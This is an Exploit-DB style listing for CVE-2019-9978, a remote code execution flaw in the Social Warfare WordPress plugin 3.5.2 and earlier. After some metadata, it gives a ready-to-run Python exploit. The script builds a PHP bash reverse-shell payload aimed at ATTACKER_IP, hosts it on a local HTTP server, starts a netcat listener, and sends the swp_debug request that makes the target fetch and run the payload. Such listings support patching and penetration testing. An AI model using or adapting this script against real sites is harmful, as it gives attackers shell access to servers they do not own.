Exploit Details
Basic Information
| Exploit Title | Social Warfare WordPress Plugin 3.5.2 – Remote Code Execution (RCE) |
|---|---|
| Exploit ID | EDB-ID:52346 |
| Type | exploitdb |
| Published | 2025-06-26T00:00:00 |
| Modified | 2025-06-26T00:00:00 |
CVSS Information
| CVSS Score | 6.1 |
|---|---|
| Severity | MEDIUM |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
CVE Information
- CVE-2019-9978
Exploit Description
Exploit Code
# Exploit Title: Social Warfare WordPress Plugin 3.5.2 – Remote Code Execution (RCE)
# Date: 25-06-2025
# Exploit Author: Huseyin Mardini (@housma)
# Original Researcher: Luka Sikic
# Original Exploit Author: hash3liZer
# Vendor Homepage: https://wordpress.org/plugins/social-warfare/
# Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip
# Version: <= 3.5.2
# CVE: CVE-2019-9978
# Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04)
# Python Version: Python 3.x
# Reference: https://www.exploit-db.com/exploits/46794
# Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978
# The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794
# Usage:
# 1. Edit the config section below and replace `ATTACKER_IP` with your machine’s IP.
# 2. Run the script: `python3 exploit.py`
# 3. It will:
# – Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE)
# – Start an HTTP server on `HTTP_PORT` to host the payload
# – Start a Netcat listener on `LISTEN_PORT`
# – Trigger the vulnerability via the vulnerable `swp_debug` parameter
# 4. On success, you get a reverse shell as `www-data`.
#
# Note:
# – PAYLOAD_FILE defines only the name of the file to be created and served.
# – Make sure ports 8001 and 4444 are open and not in use.
import requests
import threading
import http.server
import socketserver
import os
import subprocess
import time
# — Config —
TARGET_URL = “http://example.com”
ATTACKER_IP = “xxx.xxx.xx.xx” # Change to your attack box IP
HTTP_PORT = 8000
LISTEN_PORT = 4444
PAYLOAD_FILE = “payload.txt”
def create_payload():
“””Write exact reverse shell payload using valid PHP syntax”””
payload = f’
system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")
‘
with open(PAYLOAD_FILE, “w”) as f:
f.write(payload)
print(f”[+] Payload written to {PAYLOAD_FILE}”)
def start_http_server():
“””Serve payload over HTTP”””
handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer((“”, HTTP_PORT), handler) as httpd:
print(f”[+] HTTP server running at port {HTTP_PORT}”)
httpd.serve_forever()
def start_listener():
“””Start Netcat listener”””
print(f”[+] Listening on port {LISTEN_PORT} for reverse shell…”)
subprocess.call([“nc”, “-lvnp”, str(LISTEN_PORT)])
def send_exploit():
“””Trigger the exploit with vulnerable parameter”””
payload_url = f”http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}”
exploit = f”{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}”
print(f”[+] Sending exploit: {exploit}”)
try:
requests.get(exploit, timeout=5)
except requests.exceptions.RequestException:
pass
def main():
create_payload()
# Start web server in background
http_thread = threading.Thread(target=start_http_server, daemon=True)
http_thread.start()
time.sleep(2) # Give server time to start
# Start listener in background
listener_thread = threading.Thread(target=start_listener)
listener_thread.start()
time.sleep(1)
# Send the malicious request
send_exploit()
if __name__ == “__main__”:
try:
main()
except KeyboardInterrupt:
print(“[-] Interrupted by user.”)